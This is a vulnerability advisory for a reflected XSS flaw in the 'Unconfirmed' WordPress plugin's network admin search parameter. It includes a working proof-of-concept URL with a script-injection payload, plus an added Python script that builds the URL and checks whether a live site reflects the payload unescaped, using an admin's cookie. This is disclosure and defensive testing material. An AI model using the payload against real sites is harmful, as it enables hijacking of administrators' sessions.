Advisory:

XSS in Unconfirmed 1.2.3

Vulnerability

This plugin is vulnerable to a reflected XSS attack: the s (search) parameter of its network admin page is reflected into the response without being escaped. An attacker who can convince a logged-in network administrator to visit a crafted URL can run arbitrary script in that administrator's browser session, and so do anything the administrator can do.

Current state: Fixed

CVSS Summary

CVSS v2 base score for this vulnerability

  Score               6.8 (Medium)
  Vector string       AV:N/AC:M/Au:N/C:P/I:P/A:P

  Access vector       Network
  Access complexity   Medium
  Authentication      None
  Confidentiality     Partial
  Integrity           Partial
  Availability        Partial
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Log in as a network administrator (super admin) on a multisite installation and visit this URL (replacing localhost with the appropriate domain name). On a vulnerable version the browser executes the injected script and shows an alert dialog:

http://localhost/wp-admin/network/users.php?page=unconfirmed&s=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
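
The following script is an added example; it is not code from the plugin or from the advisory's authors. It rebuilds the proof-of-concept URL above from the raw payload (so the encoding can be reproduced for any host), and classifies a fetched response as reflecting the payload raw (exploitable), HTML-escaped (the usual fix for this class of bug: escaping the value with esc_attr() before echoing it into the attribute), or not at all. The sample HTML responses are constructed for illustration and are not the plugin's real markup; whether version 1.2.5 fixed the issue by exactly this means is not something the advisory states.

```python
"""Build the Unconfirmed reflected-XSS PoC URL and classify how a response
reflects the payload.  Added example; not code from the plugin or the
advisory.  The sample HTML below is constructed, not the plugin's markup."""
from urllib.parse import quote, urlsplit, parse_qs
import html
import urllib.request

# The advisory's payload: closes the surrounding attribute, then injects
# a script element.
PAYLOAD = '"><script>alert(1)</script>'

# Path of the plugin's network admin page, taken from the advisory's PoC URL.
PAGE_PATH = "/wp-admin/network/users.php"


def build_poc_url(host, payload=PAYLOAD, scheme="http"):
    """Return the PoC URL for `host`.

    quote() leaves '/' unencoded and percent-encodes '"', '<', '>', '('
    and ')', which reproduces the advisory's URL byte for byte.
    """
    return f"{scheme}://{host}{PAGE_PATH}?page=unconfirmed&s={quote(payload)}"


def payload_from_url(url):
    """Decode the `s` parameter back out of a PoC URL (round-trip check)."""
    return parse_qs(urlsplit(url).query)["s"][0]


def reflection_state(body, payload=PAYLOAD):
    """Classify a response body:

    'raw'     - the payload appears verbatim: the script element reaches
                the HTML parser, so the page is exploitable.
    'escaped' - only an HTML-escaped copy appears (what WordPress's
                esc_attr() produces: '"' as &quot;, '<' and '>' as
                &lt; and &gt;), so the value stays inside the attribute
                and no script runs.
    'absent'  - the parameter is not reflected at all.
    """
    if payload in body:
        return "raw"
    if html.escape(payload, quote=True) in body:
        return "escaped"
    return "absent"


def check_target(url, cookie_header):
    """Fetch `url` as a logged-in network admin (cookie_header is the raw
    Cookie: header value copied from an authenticated browser session)
    and classify the reflection.  Only run this against a site you are
    authorised to test."""
    req = urllib.request.Request(url, headers={"Cookie": cookie_header})
    with urllib.request.urlopen(req, timeout=10) as resp:
        body = resp.read().decode("utf-8", "replace")
    return reflection_state(body)


# Constructed sample responses (not the plugin's real markup).
VULNERABLE_RESPONSE = (
    '<form method="get"><input type="search" name="s" '
    'value=""><script>alert(1)</script>"></form>'
)
PATCHED_RESPONSE = (
    '<form method="get"><input type="search" name="s" '
    'value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;"></form>'
)

if __name__ == "__main__":
    print(build_poc_url("localhost"))
    print("vulnerable sample:", reflection_state(VULNERABLE_RESPONSE))
    print("patched sample:", reflection_state(PATCHED_RESPONSE))
```

To test a live site, copy the Cookie header from a browser session logged in as a super admin and call check_target(build_poc_url("your.domain"), cookie_header); a result of 'raw' means the unescaped reflection is still present, 'escaped' means the value is being encoded on output.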

Advisory timeline

  • 2014-04-09: Discovered.
  • 2014-04-10: Reported to plugins@wordpress.org and the author.
  • 2014-04-10: Update released.

Mitigation/further actions

Upgrade to version 1.2.5 or later.